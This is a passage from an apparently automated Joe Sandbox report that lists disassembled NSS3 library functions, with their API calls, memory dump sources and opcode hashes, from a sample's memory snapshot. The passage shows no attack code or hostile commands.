                                                            • PR_SetError.NSS3(FFFFE00F,00000000), ref: 6CA28D62
                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA28D93
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
                                                            • String ID:
                                                            • API String ID: 3131193014-0
                                                            • Opcode ID: daa7df4f0228baa8ce5bac7046f21bafd60fc1fa4027104a65e62d36a2468c45
                                                            • Instruction ID: c3db0b836a9f9346674ae8a32f313321739e9be8e4fe7fef8d02875407353f95
                                                            • Opcode Fuzzy Hash: daa7df4f0228baa8ce5bac7046f21bafd60fc1fa4027104a65e62d36a2468c45
                                                            • Instruction Fuzzy Hash: C4312872E01625AFE7009F68CD447AA7774BF15318F1C0136FA1967B90D778A9A8CBC1
                                                            Function 6CA69D60 Relevance: 10.6, APIs: 7, Instructions: 108memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6CA69C5B), ref: 6CA69D82
                                                              • Part of subcall function 6CA614C0: TlsGetValue.KERNEL32 ref: 6CA614E0
                                                              • Part of subcall function 6CA614C0: EnterCriticalSection.KERNEL32 ref: 6CA614F5
                                                              • Part of subcall function 6CA614C0: PR_Unlock.NSS3 ref: 6CA6150D
                                                            • PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6CA69C5B), ref: 6CA69DA9
                                                              • Part of subcall function 6CA61340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6CA0895A,00000000,?,00000000,?,00000000,?,00000000,?,6C9FF599,?,00000000), ref: 6CA6136A
                                                              • Part of subcall function 6CA61340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6CA0895A,00000000,?,00000000,?,00000000,?,00000000,?,6C9FF599,?,00000000), ref: 6CA6137E
                                                              • Part of subcall function 6CA61340: PL_ArenaGrow.NSS3(?,6C9FF599,?,00000000,?,6CA0895A,00000000,?,00000000,?,00000000,?,00000000,?,6C9FF599,?), ref: 6CA613CF
                                                              • Part of subcall function 6CA61340: PR_Unlock.NSS3(?,?,6CA0895A,00000000,?,00000000,?,00000000,?,00000000,?,6C9FF599,?,00000000), ref: 6CA6145C
                                                            • PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6CA69C5B), ref: 6CA69DCE
                                                              • Part of subcall function 6CA61340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6CA0895A,00000000,?,00000000,?,00000000,?,00000000,?,6C9FF599,?,00000000), ref: 6CA613F0
                                                              • Part of subcall function 6CA61340: PL_ArenaGrow.NSS3(?,6C9FF599,?,?,?,00000000,00000000,?,6CA0895A,00000000,?,00000000,?,00000000,?,00000000), ref: 6CA61445
                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000008,6CA69C5B), ref: 6CA69DDC
                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6CA69C5B), ref: 6CA69DFE
                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6CA69C5B), ref: 6CA69E43
                                                            • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,6CA69C5B), ref: 6CA69E91
                                                              • Part of subcall function 6CAAC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CAAC2BF
                                                              • Part of subcall function 6CA61560: TlsGetValue.KERNEL32(00000000,00000000,?,?,?,6CA5FAAB,00000000), ref: 6CA6157E
                                                              • Part of subcall function 6CA61560: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6CA5FAAB,00000000), ref: 6CA61592
                                                              • Part of subcall function 6CA61560: memset.VCRUNTIME140(?,00000000,?), ref: 6CA61600
                                                              • Part of subcall function 6CA61560: PL_ArenaRelease.NSS3(?,?), ref: 6CA61620
                                                              • Part of subcall function 6CA61560: PR_Unlock.NSS3(?), ref: 6CA61639
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Arena$Util$Value$Alloc_CriticalEnterSectionUnlock$GrowGrow_$ErrorMark_Releasememset
                                                            • String ID:
                                                            • API String ID: 3425318038-0
                                                            • Opcode ID: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
                                                            • Instruction ID: 8fe056fac73fb905e8be0ec8de8c6ca36116ba737a4d50ae35d141dcf98d489c
                                                            • Opcode Fuzzy Hash: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
                                                            • Instruction Fuzzy Hash: DA41A7B4501606AFE740DF26DA40BA1BBB1FF45358F548128D9148BFA0EB72E478CF90
                                                            Function 6CA2DDD0 Relevance: 10.6, APIs: 7, Instructions: 106COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SECOID_FindOIDByTag_Util.NSS3(?), ref: 6CA2DDEC
                                                              • Part of subcall function 6CA60840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CA608B4
                                                            • PK11_DigestBegin.NSS3(00000000), ref: 6CA2DE70
                                                            • PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6CA2DE83
                                                            • HASH_ResultLenByOidTag.NSS3(?), ref: 6CA2DE95
                                                            • PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6CA2DEAE
                                                            • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CA2DEBB
                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA2DECC
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: K11_$Digest$Error$BeginContextDestroyFinalFindResultTag_Util
                                                            • String ID:
                                                            • API String ID: 1091488953-0
                                                            • Opcode ID: af88e6b6882d7a8ddbec64164b8daa2dbf947378857eb5c653c0aa2d86766e9f
                                                            • Instruction ID: b6b988c443ab7a7da6307f58269b54064d8e9d360fadeb79d06e132d7c372992
                                                            • Opcode Fuzzy Hash: af88e6b6882d7a8ddbec64164b8daa2dbf947378857eb5c653c0aa2d86766e9f
                                                            • Instruction Fuzzy Hash: 7E31ABB2D002246BEB00AF64AD45BBB76B8DF55708F0D0135ED09A7B42F735D998C6E2
                                                            Function 6CA5DC10 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memcpy.VCRUNTIME140(?,?,00000000,?,?,00000000,?,?,6CA5D9E4,00000000), ref: 6CA5DC30
                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,00000000,?,?,6CA5D9E4,00000000), ref: 6CA5DC4E
                                                            • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,?,6CA5D9E4,00000000), ref: 6CA5DC5A
                                                            • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CA5DC7E
                                                            • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CA5DCAD
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Alloc_Util$Arenamemcpy
                                                            • String ID:
                                                            • API String ID: 2632744278-0
                                                            • Opcode ID: 33199a545f0b3ef1e52f5cdc720c0c562540cf9b2bc083bf66b3f59d99d0fb1a
                                                            • Instruction ID: c824bc417a8338d657c3e5c7b66b2ae4511851e8e38047c6a77ec4ab03aab61e
                                                            • Opcode Fuzzy Hash: 33199a545f0b3ef1e52f5cdc720c0c562540cf9b2bc083bf66b3f59d99d0fb1a
                                                            • Instruction Fuzzy Hash: EE319EB5A002419FE710CF2DD984B56BBF8AF05358F588428E948CBB00E771E9D4CBA1
                                                            Function 6CA6CEE0 Relevance: 10.6, APIs: 7, Instructions: 79memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PORT_ArenaMark_Util.NSS3(?,6CA6CD93,?), ref: 6CA6CEEE
                                                              • Part of subcall function 6CA614C0: TlsGetValue.KERNEL32 ref: 6CA614E0
                                                              • Part of subcall function 6CA614C0: EnterCriticalSection.KERNEL32 ref: 6CA614F5
                                                              • Part of subcall function 6CA614C0: PR_Unlock.NSS3 ref: 6CA6150D
                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CA6CD93,?), ref: 6CA6CEFC
                                                              • Part of subcall function 6CA610C0: TlsGetValue.KERNEL32(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA610F3
                                                              • Part of subcall function 6CA610C0: EnterCriticalSection.KERNEL32(?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6110C
                                                              • Part of subcall function 6CA610C0: PL_ArenaAllocate.NSS3(?,?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA61141
                                                              • Part of subcall function 6CA610C0: PR_Unlock.NSS3(?,?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA61182
                                                              • Part of subcall function 6CA610C0: TlsGetValue.KERNEL32(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6119C
                                                            • SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CA6CD93,?), ref: 6CA6CF0B
                                                              • Part of subcall function 6CA60840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CA608B4
                                                            • SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CA6CD93,?), ref: 6CA6CF1D
                                                              • Part of subcall function 6CA5FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CA58D2D,?,00000000,?), ref: 6CA5FB85
                                                              • Part of subcall function 6CA5FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CA5FBB1
                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CA6CD93,?), ref: 6CA6CF47
                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CA6CD93,?), ref: 6CA6CF67
                                                            • SECITEM_CopyItem_Util.NSS3(?,00000000,6CA6CD93,?,?,?,?,?,?,?,?,?,?,?,6CA6CD93,?), ref: 6CA6CF78
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
                                                            • String ID:
                                                            • API String ID: 4291907967-0
                                                            • Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
                                                            • Instruction ID: 9fd57950e196f76f227ca5dd8d05e0268ebc97f8bff84c1ca3db39bac73052b7
                                                            • Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
                                                            • Instruction Fuzzy Hash: E71190A5E043045BEF00AAA76D41B7BB9EC9F5464DF044039E909D7F41FB70DA4886A1
                                                            Function 6CA18C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • TlsGetValue.KERNEL32 ref: 6CA18C1B
                                                            • EnterCriticalSection.KERNEL32 ref: 6CA18C34
                                                            • PL_ArenaAllocate.NSS3 ref: 6CA18C65
                                                            • PR_Unlock.NSS3 ref: 6CA18C9C
                                                            • PR_Unlock.NSS3 ref: 6CA18CB6
                                                              • Part of subcall function 6CAADD70: TlsGetValue.KERNEL32 ref: 6CAADD8C
                                                              • Part of subcall function 6CAADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CAADDB4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
                                                            • String ID: KRAM
                                                            • API String ID: 4127063985-3815160215
                                                            • Opcode ID: b5280b7a4107f43dd8c1ed012ee43207f92ca1821f5d1768eddc741100b3c7fa
                                                            • Instruction ID: 6a225ee13fc1f4d23bdd931f5ac7f7c62cc80d11b41dc06861488db359238bf0
                                                            • Opcode Fuzzy Hash: b5280b7a4107f43dd8c1ed012ee43207f92ca1821f5d1768eddc741100b3c7fa
                                                            • Instruction Fuzzy Hash: 252181B1A096018FD700AF79C584569BBF4FF05354F06896ED888CBB11EB35D8CACB92
                                                            Function 6CB12C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PR_EnterMonitor.NSS3 ref: 6CB12CA0
                                                            • PR_ExitMonitor.NSS3 ref: 6CB12CBE
                                                            • calloc.MOZGLUE(00000001,00000014), ref: 6CB12CD1
                                                            • strdup.MOZGLUE(?), ref: 6CB12CE1
                                                            • PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6CB12D27
                                                            Strings
                                                            • Loaded library %s (static lib), xrefs: 6CB12D22
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Monitor$EnterExitPrintcallocstrdup
                                                            • String ID: Loaded library %s (static lib)
                                                            • API String ID: 3511436785-2186981405
                                                            • Opcode ID: 6db4e9e1c8ef4ed846ce8533f9c3db98adde1186adefd91d810cc037106272f2
                                                            • Instruction ID: 1d15bae01f3c82ab87f8349be0bd77460f12a44e68c4ea2e9d0a9e424d7f6fc4
                                                            • Opcode Fuzzy Hash: 6db4e9e1c8ef4ed846ce8533f9c3db98adde1186adefd91d810cc037106272f2
                                                            • Instruction Fuzzy Hash: 281104B97052909FEB008F26D844A6A77B9EB4635DF08803DD90AC7F81D731D858CBA3
                                                            Function 6CA0BDC0 Relevance: 10.6, APIs: 7, Instructions: 54memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PORT_NewArena_Util.NSS3(00000800), ref: 6CA0BDCA
                                                              • Part of subcall function 6CA60FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CA087ED,00000800,6C9FEF74,00000000), ref: 6CA61000
                                                              • Part of subcall function 6CA60FF0: PR_NewLock.NSS3(?,00000800,6C9FEF74,00000000), ref: 6CA61016
                                                              • Part of subcall function 6CA60FF0: PL_InitArenaPool.NSS3(00000000,security,6CA087ED,00000008,?,00000800,6C9FEF74,00000000), ref: 6CA6102B
                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CA0BDDB
                                                              • Part of subcall function 6CA610C0: TlsGetValue.KERNEL32(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA610F3
                                                              • Part of subcall function 6CA610C0: EnterCriticalSection.KERNEL32(?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6110C
                                                              • Part of subcall function 6CA610C0: PL_ArenaAllocate.NSS3(?,?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA61141
                                                              • Part of subcall function 6CA610C0: PR_Unlock.NSS3(?,?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA61182
                                                              • Part of subcall function 6CA610C0: TlsGetValue.KERNEL32(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6119C
                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CA0BDEC
                                                              • Part of subcall function 6CA610C0: PL_ArenaAllocate.NSS3(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6116E
                                                            • SECITEM_CopyItem_Util.NSS3(00000000,00000000,?), ref: 6CA0BE03
                                                              • Part of subcall function 6CA5FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CA58D2D,?,00000000,?), ref: 6CA5FB85
                                                              • Part of subcall function 6CA5FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CA5FBB1
                                                            • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CA0BE22
                                                            • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CA0BE30
                                                            • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CA0BE3B
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: ArenaUtil$Alloc_$AllocateArena_ErrorValue$CopyCriticalEnterFreeInitItem_LockPoolSectionUnlockcallocmemcpy
                                                            • String ID:
                                                            • API String ID: 1821307800-0
                                                            • Opcode ID: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
                                                            • Instruction ID: 7f7a5f1c69f06a849c39ec71e449b77566e4cbd874a49972d9b3816bba91801c
                                                            • Opcode Fuzzy Hash: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
                                                            • Instruction Fuzzy Hash: 390126A5B402016AF6102267BE01FAB3A584F506CDF180230FF04DAB82FB61E19D82B6
                                                            Function 6CA91C60 Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CA91C74
                                                              • Part of subcall function 6CAAC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CAAC2BF
                                                            • DeleteCriticalSection.KERNEL32(?), ref: 6CA91C92
                                                            • free.MOZGLUE(?), ref: 6CA91C99
                                                            • DeleteCriticalSection.KERNEL32(?), ref: 6CA91CCB
                                                            • free.MOZGLUE(?), ref: 6CA91CD2
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: CriticalDeleteSectionfree$ErrorValue
                                                            • String ID:
                                                            • API String ID: 3805613680-0
                                                            • Opcode ID: 96fa8dad9ef6f8d518e438891bd8214ee2e29789972b9043c9131cc91482e8cc
                                                            • Instruction ID: e2a4bddb551b66b5a03ed3413ee2d730383da35ec74d65e356986443b4b37373
                                                            • Opcode Fuzzy Hash: 96fa8dad9ef6f8d518e438891bd8214ee2e29789972b9043c9131cc91482e8cc
                                                            • Instruction Fuzzy Hash: 5201F9B1F012205FFF10AFE5DD0EB6537BCA70A708F440124E709A3B80D37590888792
                                                            Function 6CAF1C40 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • sqlite3_mprintf.NSS3(non-deterministic use of %s() in %s,?,a CHECK constraint,6C9F3D77,?,?,6C9F4E1D), ref: 6CAF1C8A
                                                            • sqlite3_free.NSS3(00000000), ref: 6CAF1CB6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: sqlite3_freesqlite3_mprintf
                                                            • String ID: a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s
                                                            • API String ID: 1840970956-3705377941
                                                            • Opcode ID: 7dcc32687e6e0aafeb0866885f4162acbb65c685750b84ba52166d7ea24be193
                                                            • Instruction ID: 94a1830eb2656bba174dfac890cf5b009db3c574805c784704521efe048f87b6
                                                            • Opcode Fuzzy Hash: 7dcc32687e6e0aafeb0866885f4162acbb65c685750b84ba52166d7ea24be193
                                                            • Instruction Fuzzy Hash: 3E01F7B5A001805BDB00BB68D81297277E5EFD634CB15486DED49DBB02EB32E897C751
                                                            Function 6CA6ED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6CA6ED6B
                                                            • PORT_Alloc_Util.NSS3(00000000), ref: 6CA6EDCE
                                                              • Part of subcall function 6CA60BE0: malloc.MOZGLUE(6CA58D2D,?,00000000,?), ref: 6CA60BF8
                                                              • Part of subcall function 6CA60BE0: TlsGetValue.KERNEL32(6CA58D2D,?,00000000,?), ref: 6CA60C15
                                                            • free.MOZGLUE(00000000,?,?,?,?,6CA6B04F), ref: 6CA6EE46
                                                            • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CA6EECA
                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CA6EEEA
                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6CA6EEFB
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
